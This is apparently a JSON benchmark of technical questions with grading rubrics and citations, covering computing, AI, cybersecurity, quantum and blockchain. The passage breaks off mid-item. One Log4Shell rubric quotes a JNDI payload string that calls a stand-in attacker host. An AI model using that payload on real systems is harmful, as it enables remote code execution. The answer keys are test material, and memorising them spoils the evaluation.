{ "$schema": "bee-eval-v1", "version": "1.0.0", "created": "2026-04-29", "description": "Per-domain eval set for Bee. 10 Tier-1 domains × 12 questions each = 120 questions. Every question carries a verifiable citation (NIST/RFC/Qiskit-textbook/SWC/etc.) so an LLM-judge can grade against a real source rather than its own training data. Difficulty mix: ~3 beginner, ~6 intermediate, ~3 expert per domain.", "scoring": { "judge": "deepseek-v4-pro", "rubric_levels": ["correct", "partial", "wrong", "refused"], "score_map": {"correct": 1.0, "partial": 0.5, "wrong": 0.0, "refused": 0.0} }, "domains": { "general": { "description": "broad reasoning + factual + multi-step explanations", "questions": [ {"id": "general-01", "difficulty": "beginner", "prompt": "Explain in 2-3 sentences why a hash table has O(1) average lookup time but O(n) worst case.", "rubric": "Must mention: average case is O(1) due to direct indexing via hash function; worst case is O(n) when many keys collide and degrade to linear probing/list traversal. Bonus: mentions load factor.", "citation": "https://en.wikipedia.org/wiki/Hash_table#Performance"}, {"id": "general-02", "difficulty": "beginner", "prompt": "What does the acronym ACID stand for in databases, and what does each letter mean?", "rubric": "Atomicity (all-or-nothing), Consistency (DB stays valid), Isolation (concurrent txns don't see each other's intermediates), Durability (committed survives crash). All four must be present.", "citation": "https://en.wikipedia.org/wiki/ACID"}, {"id": "general-03", "difficulty": "intermediate", "prompt": "A team complains that their REST API returns 200 OK with an error JSON body when authentication fails. What HTTP status code should they use instead, and why?", "rubric": "Should use 401 Unauthorized (per RFC 9110). Reason: 200 means success; using it for auth failure breaks every HTTP intermediary that relies on status codes (caches, monitoring, retries). 
Bonus: 403 distinction (auth'd but forbidden).", "citation": "https://www.rfc-editor.org/rfc/rfc9110.html#name-401-unauthorized"}, {"id": "general-04", "difficulty": "intermediate", "prompt": "Explain the difference between a process and a thread in 3-4 sentences.", "rubric": "Process = isolated memory space, OS-level scheduling unit, has its own PID. Thread = lighter unit of execution within a process, shares the process's memory/heap. Threads are cheaper to create and switch between, but a crash in one can take down the others. Process isolation is enforced by hardware (MMU).", "citation": "https://en.wikipedia.org/wiki/Thread_(computing)"}, {"id": "general-05", "difficulty": "intermediate", "prompt": "Why is `2 + 2 == 4` exactly true in IEEE 754 floating point, but `0.1 + 0.2 == 0.3` is false?", "rubric": "Small powers of 2 are exactly representable; 0.1, 0.2, 0.3 are repeating fractions in binary so they round to the nearest representable double, accumulating tiny errors. The sum 0.1+0.2 rounds differently than the literal 0.3.", "citation": "https://en.wikipedia.org/wiki/IEEE_754"}, {"id": "general-06", "difficulty": "intermediate", "prompt": "What is the CAP theorem and what's the practical takeaway for distributed system design?", "rubric": "Of {Consistency, Availability, Partition tolerance}, you can guarantee at most 2 simultaneously when a network partition occurs. Practical takeaway: in real distributed systems P is unavoidable, so the real choice is C vs A during partitions. Mentions Brewer/Gilbert-Lynch credit is bonus.", "citation": "https://en.wikipedia.org/wiki/CAP_theorem"}, {"id": "general-07", "difficulty": "expert", "prompt": "An engineer says they want to use Conflict-free Replicated Data Types (CRDTs) instead of operational transformation. 
Give two specific advantages and one specific tradeoff.", "rubric": "Advantages (any 2): no central server / convergence without coordination, easier offline-first design, eventual consistency proven mathematically, simpler conflict semantics. Tradeoff: state size grows over time (need garbage collection / pruning), or some semantics (e.g., true 'last-write-wins') aren't naturally expressible without metadata.", "citation": "https://en.wikipedia.org/wiki/Conflict-free_replicated_data_type"}, {"id": "general-08", "difficulty": "beginner", "prompt": "What is the speed of light in a vacuum, in meters per second? You can give the rounded number.", "rubric": "Approximately 3.0 × 10^8 m/s (or 299,792,458 m/s exactly, since 1983 SI definition).", "citation": "https://en.wikipedia.org/wiki/Speed_of_light"}, {"id": "general-09", "difficulty": "intermediate", "prompt": "Briefly: what is a memory leak in a garbage-collected language like Java or Python? Give one common pattern that causes it.", "rubric": "Memory the program no longer needs but still holds a reference to, so the GC can't reclaim it. Common patterns: unbounded caches, listeners/callbacks that never deregister, growing global lists/dicts, closures capturing large objects, ThreadLocal in pooled threads.", "citation": "https://docs.oracle.com/en/java/javase/21/troubleshoot/memory-leaks.html"}, {"id": "general-10", "difficulty": "expert", "prompt": "What is amortized analysis, and why is the amortized cost of appending to a Python list O(1) even though resizing is occasionally O(n)?", "rubric": "Amortized analysis averages cost across a sequence of operations. Python lists overallocate (grow by ~1.125x or doubling); a resize is O(n) but happens every n appends, so the cost spread over those n appends is O(n)/n = O(1). 
Each append's amortized cost is O(1).", "citation": "https://docs.python.org/3/faq/design.html#how-are-lists-implemented-in-cpython"}, {"id": "general-11", "difficulty": "intermediate", "prompt": "Explain the difference between TCP and UDP in one paragraph. Give one example use case for each.", "rubric": "TCP: connection-oriented, reliable, ordered, retransmits dropped packets, congestion-controlled. Use case: HTTP/HTTPS, file transfers, SSH. UDP: connectionless, fire-and-forget, no retransmission, lower overhead. Use case: DNS, real-time video/audio, gaming, QUIC's underlying transport.", "citation": "https://www.rfc-editor.org/rfc/rfc9293.html (TCP), https://www.rfc-editor.org/rfc/rfc768 (UDP)"}, {"id": "general-12", "difficulty": "expert", "prompt": "What is Big O notation's biggest practical limitation when comparing two algorithms? Give a concrete example.", "rubric": "Big O drops constants and lower-order terms, so two algorithms with the same Big O class can have wildly different real-world performance. Example: insertion sort O(n^2) is faster than merge sort O(n log n) for n < ~20-50 because of cache locality and lower constant factors; quicksort with median-of-3 pivot has the same O(n^2) worst case as bubble sort but is dramatically faster in practice. Or: O(n) algorithm with constant 1000 is slower than O(n log n) with constant 1 for any realistic n.", "citation": "https://en.wikipedia.org/wiki/Big_O_notation#Family_of_Bachmann%E2%80%93Landau_notations"} ] }, "programming": { "description": "code review, debugging, language-specific patterns, build/test tooling", "questions": [ {"id": "programming-01", "difficulty": "beginner", "prompt": "In Python, what's the difference between `is` and `==`?", "rubric": "`is` checks identity (same object in memory); `==` checks equality (calls __eq__). Example: `[1,2] == [1,2]` is True, but `[1,2] is [1,2]` is False. 
Singleton check: `x is None` is the canonical way (not `x == None`).", "citation": "https://docs.python.org/3/reference/expressions.html#comparisons"}, {"id": "programming-02", "difficulty": "beginner", "prompt": "Write a Python function `is_palindrome(s: str) -> bool` that ignores case and non-alphanumeric characters.", "rubric": "Must define `def is_palindrome(s)`. Strips non-alphanumeric, lowercases, compares to reverse. Idiomatic: `s = ''.join(c.lower() for c in s if c.isalnum()); return s == s[::-1]`. Empty string returning True is acceptable.", "citation": "https://docs.python.org/3/library/stdtypes.html#str.isalnum"}, {"id": "programming-03", "difficulty": "intermediate", "prompt": "What's wrong with this Python code: `def add_to(item, lst=[]): lst.append(item); return lst` ? How do you fix it?", "rubric": "Mutable default argument is shared across all calls — appending mutates the same list. Calling `add_to(1)` twice returns `[1,1]`, not `[1]`. Fix: `def add_to(item, lst=None): if lst is None: lst = []; lst.append(item); return lst`.", "citation": "https://docs.python.org/3/reference/compound_stmts.html#function-definitions (default value evaluated once)"}, {"id": "programming-04", "difficulty": "intermediate", "prompt": "In Rust, what's the difference between `String` and `&str`? When would you take each as a function parameter?", "rubric": "`String` is owned, heap-allocated, growable. `&str` is a borrowed slice into UTF-8 bytes. As a parameter: take `&str` for read-only (most flexible — accepts both `&String` via deref coercion and `&str` literals); take `String` only when you need ownership (e.g., to store it). 
Best practice: prefer `&str` for params unless you need ownership.", "citation": "https://doc.rust-lang.org/book/ch04-03-slices.html"}, {"id": "programming-05", "difficulty": "intermediate", "prompt": "Explain Go's `defer` statement and one common pitfall.", "rubric": "`defer` schedules a function call to run when the surrounding function returns (LIFO order). Pitfall: arguments are evaluated at defer-statement time, not at call time — `defer fmt.Println(i)` inside a loop captures the current `i`, not the final one. Or: deferring inside a loop accumulates many deferred calls; can cause resource exhaustion if files/locks aren't released until function exit.", "citation": "https://go.dev/blog/defer-panic-and-recover"}, {"id": "programming-06", "difficulty": "intermediate", "prompt": "What is structural typing vs nominal typing? Which one does TypeScript use?", "rubric": "Nominal: types match by name (Java, C#, Rust). Structural: types match by shape — if the shape fits, it's the same type. TypeScript is structural: `interface A { x: number } interface B { x: number }` are interchangeable. Practical implication: object literals can satisfy multiple interfaces simultaneously.", "citation": "https://www.typescriptlang.org/docs/handbook/type-compatibility.html"}, {"id": "programming-07", "difficulty": "expert", "prompt": "What does `git rebase -i HEAD~3 --autosquash` do, and how does it interact with `git commit --fixup=`?", "rubric": "`--autosquash` reorders any commits with `fixup!` or `squash!` prefixes (created by `--fixup`/`--squash`) so they land immediately after their target commit, ready for squash. Workflow: make a `--fixup=` commit during dev → run `rebase -i HEAD~N --autosquash` → editor opens with the fixups already aligned. 
Saves manual reordering.", "citation": "https://git-scm.com/docs/git-rebase#Documentation/git-rebase.txt---autosquash"}, {"id": "programming-08", "difficulty": "beginner", "prompt": "Write a Python list comprehension that returns squares of even numbers in `[1, 2, 3, 4, 5, 6]`.", "rubric": "`[x*x for x in [1,2,3,4,5,6] if x % 2 == 0]` → `[4, 16, 36]`. Or `[x**2 for ... if x%2==0]`.", "citation": "https://docs.python.org/3/tutorial/datastructures.html#list-comprehensions"}, {"id": "programming-09", "difficulty": "expert", "prompt": "In a Python web app handling 10k requests/sec, you switch from blocking sync I/O to asyncio. The throughput barely changes. Name three plausible reasons.", "rubric": "Any three of: (1) the bottleneck is CPU/database/external service latency, not I/O blocking; (2) GIL contention if there's CPU work between awaits; (3) the underlying library still does sync I/O under an async wrapper (e.g., a sync DB driver wrapped in run_in_executor); (4) connection pool size is the real cap; (5) DNS / TLS handshakes done sequentially rather than batched.", "citation": "https://docs.python.org/3/library/asyncio.html"}, {"id": "programming-10", "difficulty": "intermediate", "prompt": "What's the difference between `git merge` and `git rebase`? Which produces a cleaner history, and what's the cost?", "rubric": "Merge preserves both branches' history with a merge commit; rebase replays your commits on top of the target branch (linear history). Rebase produces cleaner history but rewrites commit hashes — dangerous on shared/published branches. Merge is safe but creates merge commits.", "citation": "https://git-scm.com/book/en/v2/Git-Branching-Rebasing"}, {"id": "programming-11", "difficulty": "intermediate", "prompt": "Write a SQL query: from a table `orders(id, user_id, total, created_at)`, return the user with the highest total spend in 2026, with their total. 
Use standard SQL.", "rubric": "Must SUM(total) GROUP BY user_id, filter created_at year, ORDER BY total DESC LIMIT 1. Acceptable variations: window function (ROW_NUMBER), subquery with MAX(SUM(...)), CTE. Should handle the tie case or note it.", "citation": "https://www.postgresql.org/docs/current/sql-select.html"}, {"id": "programming-12", "difficulty": "expert", "prompt": "What is tail-call optimization (TCO)? Which mainstream languages support it, and why doesn't Python?", "rubric": "TCO: when the last action of a function is a function call, reuse the current stack frame instead of pushing a new one — turns recursion into iteration, prevents stack overflow. Supports: Scheme/Racket (mandated), Lua, OCaml, Erlang, Scala (annotated), C/C++ (compilers may but not guaranteed). Python deliberately does NOT — Guido's stated reason: TCO obscures stack traces, hurts debuggability. Workaround: rewrite as a loop.", "citation": "https://neopythonic.blogspot.com/2009/04/tail-recursion-elimination.html (Guido's post)"} ] }, "ai": { "description": "ML/AI fundamentals: model architecture, training, inference, evaluation, RAG, fine-tuning, prompt engineering", "questions": [ {"id": "ai-01", "difficulty": "beginner", "prompt": "What's the difference between supervised, unsupervised, and reinforcement learning, in one sentence each?", "rubric": "Supervised: learn input→output from labeled examples. Unsupervised: learn structure/patterns from unlabeled data (clustering, dimensionality reduction, density estimation). Reinforcement: learn a policy by interacting with an environment and receiving rewards.", "citation": "https://en.wikipedia.org/wiki/Machine_learning"}, {"id": "ai-02", "difficulty": "intermediate", "prompt": "In LoRA fine-tuning, what's the role of `r` (rank) and `alpha`? What's a typical r value for a 7B model?", "rubric": "`r` is the rank of the low-rank update — controls capacity (higher r = more parameters). 
`alpha` is a scaling factor: the effective LoRA contribution = (alpha / r) * B*A*x. Typical r for 7B: 8-32 (most papers use 8 or 16). Typical alpha = 16 or 32. The ratio alpha/r is what really matters for the magnitude of the update.", "citation": "https://arxiv.org/abs/2106.09685 (LoRA paper)"}, {"id": "ai-03", "difficulty": "intermediate", "prompt": "Why does the transformer's attention mechanism scale as O(n²) with sequence length? What's one technique that addresses this?", "rubric": "Each token attends to every other token → n×n attention matrix → O(n²) time and memory. Techniques (any one): FlashAttention (recompute, kernel-fused, still O(n²) compute but O(n) memory), sparse attention (Longformer, BigBird), linear attention approximations (Performer, Linformer), sliding window (Mistral), Mamba/state-space models (linear in n).", "citation": "https://arxiv.org/abs/2205.14135 (FlashAttention)"}, {"id": "ai-04", "difficulty": "expert", "prompt": "What's the difference between RLHF and DPO for preference fine-tuning? Why has DPO become more popular?", "rubric": "RLHF: train a reward model from preferences, then use PPO to optimize the policy against that reward. Three stages, complex, unstable. DPO: directly optimize the policy from preference pairs without an explicit reward model — uses a closed-form analytical solution that turns the RL problem into supervised classification. Popular because: simpler (no reward model, no PPO), more stable, lower compute, comparable or better results.", "citation": "https://arxiv.org/abs/2305.18290 (DPO paper)"}, {"id": "ai-05", "difficulty": "beginner", "prompt": "What does 'temperature' control in LLM sampling? What does temperature=0 do?", "rubric": "Temperature scales the logits before softmax; lower = more peaked distribution (deterministic), higher = flatter (more random). T=0 = greedy decoding (always pick the argmax token). T=1 = use raw probabilities. 
Typical creative range 0.7-1.2.", "citation": "https://platform.openai.com/docs/guides/text-generation"}, {"id": "ai-06", "difficulty": "intermediate", "prompt": "What is a context window in an LLM, and what happens when input exceeds it?", "rubric": "Context window = max number of tokens the model can attend to at once (GPT-4-turbo: 128K, Claude Opus 4.7: 200K-1M). Exceeding it: depending on tooling, either truncated (oldest tokens dropped), errored, or chunked. The model has zero awareness of anything beyond the window.", "citation": "https://platform.openai.com/docs/models"}, {"id": "ai-07", "difficulty": "expert", "prompt": "What's the difference between a Mixture of Experts (MoE) model and a dense model of the same parameter count? Give one practical implication.", "rubric": "MoE has many specialist sub-networks; only a few are activated per token (sparse routing). Total params >> active params (e.g., DeepSeek V3: 671B total, ~37B active). Practical: same inference compute as a small dense model but with the knowledge capacity of a much larger one. Tradeoff: harder to train (load balancing, expert collapse), bigger memory footprint at rest, complex serving infrastructure.", "citation": "https://arxiv.org/abs/1701.06538 (Sparsely-Gated Mixture-of-Experts)"}, {"id": "ai-08", "difficulty": "intermediate", "prompt": "What is a 'system prompt' vs a 'user prompt' in instruction-tuned models? Why does it matter?", "rubric": "System prompt: persistent instructions about role/style/constraints, set once at conversation start. User prompt: the actual query. Models trained with chat templates treat them differently — system prompt has higher precedence, persists across turns, used for behavior shaping. 
In Claude/GPT/Llama-Instruct chat templates, they have distinct role tokens (e.g., `<|system|>` vs `<|user|>`).", "citation": "https://huggingface.co/docs/transformers/main/en/chat_templating"}, {"id": "ai-09", "difficulty": "expert", "prompt": "In RAG (retrieval-augmented generation), what's the typical embedding dimensionality, and why might you choose a smaller one?", "rubric": "Common: 384 (MiniLM/BGE-small), 768 (BERT-base/mpnet-base), 1024 (BGE-large), 1536 (OpenAI text-embedding-3-small), 3072 (text-embedding-3-large). Smaller: less storage, faster ANN search, sometimes comparable retrieval quality. Larger captures finer semantic distinctions. Tradeoff: 384 is plenty for English retrieval over <1M docs; >1M docs benefit from 768+.", "citation": "https://huggingface.co/spaces/mteb/leaderboard"}, {"id": "ai-10", "difficulty": "intermediate", "prompt": "What's the difference between fine-tuning a full model and using LoRA? When would you choose each?", "rubric": "Full fine-tune: update every parameter. Cost: full optimizer state (≈4× param memory), risks catastrophic forgetting, large checkpoint sizes. LoRA: train only a small low-rank decomposition (~0.1-1% of params). Cost: much cheaper, smaller checkpoints, less forgetting. Choose full fine-tune for: very different task/domain than pre-training, lots of data. Choose LoRA for: moderate adaptation, multi-task with adapter swapping, limited compute.", "citation": "https://arxiv.org/abs/2106.09685"}, {"id": "ai-11", "difficulty": "expert", "prompt": "What is 'catastrophic forgetting' in continual learning, and what's one mitigation?", "rubric": "When fine-tuning on new task, model loses performance on old tasks because gradient updates overwrite the relevant weights. 
Mitigations (any one): elastic weight consolidation (EWC) — penalize moves away from important old weights; LoRA — keeps base frozen; experience replay (mix old and new data); progressive networks; LwF (learning without forgetting via distillation).", "citation": "https://www.pnas.org/doi/10.1073/pnas.1611835114 (EWC paper)"}, {"id": "ai-12", "difficulty": "intermediate", "prompt": "Explain BLEU vs ROUGE in 2-3 sentences. When is each used?", "rubric": "BLEU: precision-oriented, n-gram overlap of generated text with reference(s). Designed for translation. ROUGE: recall-oriented, used for summarization (ROUGE-N for n-grams, ROUGE-L for longest common subsequence). Both are surface-level metrics that don't capture meaning — modern eval prefers BERTScore or LLM-as-judge.", "citation": "https://aclanthology.org/W04-1013/ (ROUGE), https://aclanthology.org/P02-1040/ (BLEU)"} ] }, "cybersecurity": { "description": "threat modeling, vulnerability analysis, OWASP, cryptography, incident response (defensive only)", "questions": [ {"id": "cybersecurity-01", "difficulty": "beginner", "prompt": "What does the acronym OWASP Top 10 refer to? Name 3 of the categories from the most recent (2021) edition.", "rubric": "OWASP Top 10 = the most critical web application security risks, published by OWASP. 2021 categories: Broken Access Control, Cryptographic Failures, Injection, Insecure Design, Security Misconfiguration, Vulnerable Components, Auth Failures, Software/Data Integrity Failures, Logging/Monitoring Failures, SSRF. Any 3 from this list.", "citation": "https://owasp.org/Top10/"}, {"id": "cybersecurity-02", "difficulty": "intermediate", "prompt": "What is SQL injection? Give one defensive technique that ELIMINATES it (not just mitigates).", "rubric": "SQL injection: attacker-supplied input is concatenated into a SQL query, allowing them to alter the query semantics. 
Defensive technique that eliminates: parameterized queries / prepared statements (the database treats input as data, not SQL). Input validation / WAF / escaping are mitigations, not eliminators. ORMs typically use parameterization under the hood.", "citation": "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"}, {"id": "cybersecurity-03", "difficulty": "intermediate", "prompt": "What is the principle of least privilege, and how does it apply to a Linux service running as root?", "rubric": "Each user/process should have only the minimum permissions needed to do its job. Service running as root: violates POLP — full system access if compromised. Mitigation: run as dedicated unprivileged user, drop capabilities, use systemd unit hardening (NoNewPrivileges, PrivateTmp, ProtectSystem=strict), or chroot/container.", "citation": "https://www.nist.gov/news-events/news/2017/04/principle-least-privilege-fundamental-cybersecurity"}, {"id": "cybersecurity-04", "difficulty": "expert", "prompt": "What is post-quantum cryptography (PQC), and which algorithm did NIST standardize for general-purpose key encapsulation in 2024?", "rubric": "PQC = cryptographic algorithms believed secure against quantum computers (Shor's algorithm breaks RSA/ECC). NIST standardized: ML-KEM (Module-Lattice KEM, formerly CRYSTALS-Kyber, FIPS 203, August 2024) for key encapsulation. Also: ML-DSA (Dilithium, FIPS 204) for signatures, SLH-DSA (SPHINCS+, FIPS 205).", "citation": "https://csrc.nist.gov/pubs/fips/203/final"}, {"id": "cybersecurity-05", "difficulty": "beginner", "prompt": "Explain the difference between symmetric and asymmetric encryption in 2-3 sentences. Give one example algorithm of each.", "rubric": "Symmetric: same key encrypts and decrypts (AES, ChaCha20). Fast, but key distribution is the hard problem. Asymmetric: public/private key pair — encrypt with one, decrypt with the other (RSA, ECC, Ed25519, ML-KEM). Slower, but solves key distribution. 
Real systems use both: asymmetric to exchange a symmetric session key, then symmetric for bulk data (TLS handshake pattern).", "citation": "https://www.rfc-editor.org/rfc/rfc8446 (TLS 1.3)"}, {"id": "cybersecurity-06", "difficulty": "intermediate", "prompt": "What is CSRF (Cross-Site Request Forgery), and what's the standard mitigation?", "rubric": "CSRF: attacker tricks a user's authenticated browser into making an unwanted request (e.g., a form post that transfers funds). Browser auto-attaches cookies. Standard mitigation: CSRF tokens (one-time random value tied to session, validated on state-changing requests), or SameSite=Strict/Lax cookies, or double-submit cookie pattern. Modern frameworks (Django, Rails, Laravel) handle this automatically.", "citation": "https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html"}, {"id": "cybersecurity-07", "difficulty": "intermediate", "prompt": "What's the difference between authentication and authorization? Give a concrete example showing both in a single API request.", "rubric": "Authentication = who are you (verify identity, e.g. via JWT/session/OAuth token). Authorization = what can you do (check if identity has permission for this action). Example: a request `DELETE /api/projects/42` arrives with a Bearer token. Auth: server validates JWT signature → identifies user_id=alice. Authz: server checks alice's role/ACL on project 42 → denies if not owner. Both must pass.", "citation": "https://www.rfc-editor.org/rfc/rfc6749 (OAuth 2.0)"}, {"id": "cybersecurity-08", "difficulty": "intermediate", "prompt": "What does STRIDE stand for, and what's it used for?", "rubric": "STRIDE = Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege. Used for threat modeling — a structured way to enumerate threats per component or data flow. Microsoft origin (Howard/LeBlanc).", "citation": "https://learn.microsoft.com/en-us/azure/security/develop/threat-modeling-tool-threats"}, {"id": "cybersecurity-09", "difficulty": "intermediate", "prompt": "What's the difference between MD5, SHA-256, and bcrypt? Which should you use for password hashing?", "rubric": "MD5/SHA-256: cryptographic hash functions, fast — designed for fast hashing of arbitrary data. bcrypt: deliberately slow password hash with work factor (cost), built-in salt. Use bcrypt (or Argon2id, or scrypt) for passwords. NEVER MD5/SHA-256 raw — they're too fast, allowing brute-force/rainbow tables.", "citation": "https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html"}, {"id": "cybersecurity-10", "difficulty": "expert", "prompt": "Reference CVE-2021-44228 (Log4Shell). What was the vulnerability, what was the canonical fix, and what's the lesson for input handling?", "rubric": "Log4Shell: Apache Log4j 2.x JNDI lookup feature allowed user-supplied strings like `${jndi:ldap://attacker.com/evil}` to trigger remote class loading and RCE. Canonical fix: upgrade to Log4j 2.17.0+ (which removes JNDI lookups by default); setting `log4j2.formatMsgNoLookups=true` was only an interim mitigation and was later shown incomplete (CVE-2021-45046). Lesson: log strings should NEVER be interpreted/parsed; logging libraries should treat input as opaque data.", "citation": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"}, {"id": "cybersecurity-11", "difficulty": "beginner", "prompt": "What is two-factor authentication (2FA), and why is SMS-based 2FA considered weaker than TOTP/hardware keys?", "rubric": "2FA: combine two of {something you know, something you have, something you are}. SMS is weaker because: SIM swap attacks, SS7 protocol vulnerabilities, phone number portability fraud, plaintext on cell network. 
TOTP (RFC 6238 — Google Authenticator-style) and hardware keys (FIDO2/WebAuthn) don't depend on the cell network and are bound to a device.", "citation": "https://www.rfc-editor.org/rfc/rfc6238 (TOTP)"}, {"id": "cybersecurity-12", "difficulty": "expert", "prompt": "What is server-side request forgery (SSRF), and why is the AWS instance metadata service (IMDSv1) a famous target?", "rubric": "SSRF: attacker tricks a server into making a request to a URL of the attacker's choice — internal services, cloud metadata endpoints, etc. AWS IMDSv1 at 169.254.169.254 returns temporary credentials with no auth — an SSRF that hits it can leak the instance's IAM role credentials (the Capital One 2019 breach). Mitigation: IMDSv2 requires a session token (PUT then GET), blocking simple SSRF. Also: deny outbound connections to link-local addresses from app servers.", "citation": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html"} ] }, "quantum": { "description": "quantum computing fundamentals, Qiskit, NISQ-era realism, post-quantum crypto", "questions": [ {"id": "quantum-01", "difficulty": "beginner", "prompt": "What is a qubit, and how does it differ from a classical bit?", "rubric": "Qubit: quantum two-level system that can be in a superposition α|0⟩ + β|1⟩, where |α|² + |β|² = 1. Classical bit is 0 or 1. Measuring a qubit collapses it to |0⟩ (probability |α|²) or |1⟩ (probability |β|²). Qubits also support entanglement — joint states that can't be factored into individual qubit states.", "citation": "https://qiskit.org/textbook/ch-states/representing-qubit-states.html"}, {"id": "quantum-02", "difficulty": "intermediate", "prompt": "What's the difference between Shor's algorithm and Grover's algorithm? Which threatens current cryptography?", "rubric": "Shor's: factors integers (and computes discrete logs) in polynomial time on a quantum computer — exponential speedup over classical. 
Grover's: unstructured search in O(√N) vs classical O(N) — quadratic speedup. Shor's threatens RSA, ECC, DH (which rely on factoring/DLP being hard). Grover's only halves the effective bit security of symmetric ciphers (AES-256 → effectively AES-128, still safe by doubling key sizes).", "citation": "https://arxiv.org/abs/quant-ph/9508027 (Shor), https://arxiv.org/abs/quant-ph/9605043 (Grover)"}, {"id": "quantum-03", "difficulty": "intermediate", "prompt": "What does NISQ stand for, and what are the practical limitations it implies?", "rubric": "NISQ = Noisy Intermediate-Scale Quantum (Preskill 2018). Implies: tens to hundreds of physical qubits, no fault tolerance, decoherence times in microseconds, gate errors ~0.1-1%, very limited circuit depth (~50-100 gates) before noise dominates. Practical: most claimed quantum advantages on real hardware are sampling-style, not general-purpose computation.", "citation": "https://arxiv.org/abs/1801.00862 (Preskill NISQ paper)"}, {"id": "quantum-04", "difficulty": "beginner", "prompt": "Write a Qiskit snippet that creates a Bell state (|Φ+⟩ = (|00⟩+|11⟩)/√2) on 2 qubits and measures both.", "rubric": "Must include: `qc = QuantumCircuit(2, 2); qc.h(0); qc.cx(0, 1); qc.measure([0,1], [0,1])`. The Hadamard on qubit 0 creates superposition, CNOT entangles them. Acceptable variations include using `cx(0,1)` or `cnot`.", "citation": "https://qiskit.org/textbook/ch-gates/multiple-qubits-entangled-states.html"}, {"id": "quantum-05", "difficulty": "intermediate", "prompt": "Explain the Hadamard gate's matrix representation and what it does to |0⟩ and |1⟩.", "rubric": "H = (1/√2) * [[1, 1], [1, -1]]. H|0⟩ = (|0⟩+|1⟩)/√2 = |+⟩. H|1⟩ = (|0⟩-|1⟩)/√2 = |-⟩. Creates an equal superposition; H is its own inverse (H² = I).", "citation": "https://qiskit.org/textbook/ch-states/single-qubit-gates.html"}, {"id": "quantum-06", "difficulty": "intermediate", "prompt": "What is quantum entanglement, and why does it matter for quantum algorithms?", "rubric": "Entanglement: two or more qubits in a joint state that can't be factored into individual states (e.g., (|00⟩+|11⟩)/√2). Measuring one instantly determines the other's outcome correlations, regardless of distance — but doesn't transmit information FTL. Matters for algorithms because it enables quantum parallelism: an entangled n-qubit register encodes 2^n amplitudes simultaneously.", "citation": "https://qiskit.org/textbook/ch-gates/multiple-qubits-entangled-states.html"}, {"id": "quantum-07", "difficulty": "expert", "prompt": "What's the difference between a logical qubit and a physical qubit in fault-tolerant quantum computing?", "rubric": "Physical qubit: actual hardware qubit (superconducting, trapped ion, photonic). Noisy. Logical qubit: error-corrected qubit encoded across many physical qubits via a quantum error-correcting code (e.g., surface code requires ~1000+ physical qubits per logical qubit at current error rates). Fault-tolerant computation requires logical qubits; today's NISQ devices have only physical qubits.", "citation": "https://en.wikipedia.org/wiki/Surface_code"}, {"id": "quantum-08", "difficulty": "intermediate", "prompt": "How many Grover iterations are optimal for searching an unstructured list of N=16 items, and what's the success probability?", "rubric": "Optimal iterations ≈ (π/4)√N = (π/4)*4 ≈ 3.14 → round to 3. With 3 iterations on N=16, success probability is approximately sin²((2k+1)θ) where sin θ = 1/√N — ends up ~96% for k=3. 
Acceptable answer: '~3 iterations, very high success probability (>95%)'.", "citation": "https://qiskit.org/textbook/ch-algorithms/grover.html"}, {"id": "quantum-09", "difficulty": "expert", "prompt": "Why can't quantum computers be used to make a copy of an unknown quantum state? Reference the relevant theorem.", "rubric": "No-cloning theorem (Wootters & Zurek 1982; Dieks 1982): no quantum operation can copy an arbitrary unknown state |ψ⟩. Mathematically: a unitary U can't satisfy U|ψ⟩|0⟩ = |ψ⟩|ψ⟩ for all |ψ⟩ — would violate linearity. Practical implication: enables quantum key distribution (BB84) — eavesdropping is detectable because Eve can't perfectly clone the photon.", "citation": "https://www.nature.com/articles/299802a0 (Wootters-Zurek)"}, {"id": "quantum-10", "difficulty": "intermediate", "prompt": "What is decoherence, and why does it limit quantum computation?", "rubric": "Decoherence: loss of quantum superposition/entanglement due to interaction with the environment (thermal photons, magnetic field fluctuations, vibrations). Quantum information leaks into the environment, making the qubit behave classically. T1 (relaxation) and T2 (dephasing) coherence times bound the maximum circuit depth — typical superconducting qubits: T2 ≈ 50-200 μs, gates take ~50-500 ns, so ~100-1000 gates max before noise dominates.", "citation": "https://qiskit.org/textbook/ch-quantum-hardware/error-correction-repetition-code.html"}, {"id": "quantum-11", "difficulty": "beginner", "prompt": "What does the Pauli-X gate do, and what's its matrix representation?", "rubric": "Pauli-X = quantum NOT gate. X|0⟩ = |1⟩, X|1⟩ = |0⟩. Matrix: [[0, 1], [1, 0]]. Self-inverse (X² = I).", "citation": "https://qiskit.org/textbook/ch-states/single-qubit-gates.html"}, {"id": "quantum-12", "difficulty": "expert", "prompt": "What's the difference between gate-model quantum computing and quantum annealing? 
Which approach is D-Wave's, and what problems is it suited to?", "rubric": "Gate model: discrete unitary operations (gates) on qubits, universal computation (Qiskit, IBM Heron, IonQ). Quantum annealing: continuous evolution of a Hamiltonian to find ground state — solves optimization problems (specifically QUBO / Ising). D-Wave is annealing-only, not universal. Suited to: combinatorial optimization, sampling, some ML problems. NOT suited to: Shor's algorithm, general quantum simulation.", "citation": "https://en.wikipedia.org/wiki/Quantum_annealing"} ] }, "blockchain": { "description": "Bitcoin/Ethereum mechanics, smart contract design, consensus, cryptographic primitives", "questions": [ {"id": "blockchain-01", "difficulty": "beginner", "prompt": "What is a blockchain, in 2-3 sentences? Mention the key data structure.", "rubric": "Distributed append-only ledger. Each block contains a list of transactions and a hash of the previous block — forming a chain of cryptographic commitments. Tampering with any past block breaks all subsequent hashes. Validated by a consensus mechanism (PoW, PoS, BFT) across a peer-to-peer network.", "citation": "https://bitcoin.org/bitcoin.pdf"}, {"id": "blockchain-02", "difficulty": "intermediate", "prompt": "What's the difference between Proof of Work (PoW) and Proof of Stake (PoS)? Why did Ethereum migrate?", "rubric": "PoW: miners spend computational work (hashing) to propose blocks; energy-intensive, secured by hashpower (Bitcoin). PoS: validators stake currency to propose blocks; secured by economic stake. Ethereum's merge (Sept 2022): ~99.95% energy reduction, faster finality (12-min vs probabilistic), and sharply reduced ETH issuance — which, combined with the pre-merge EIP-1559 fee burn (London, Aug 2021), can make net supply deflationary. 
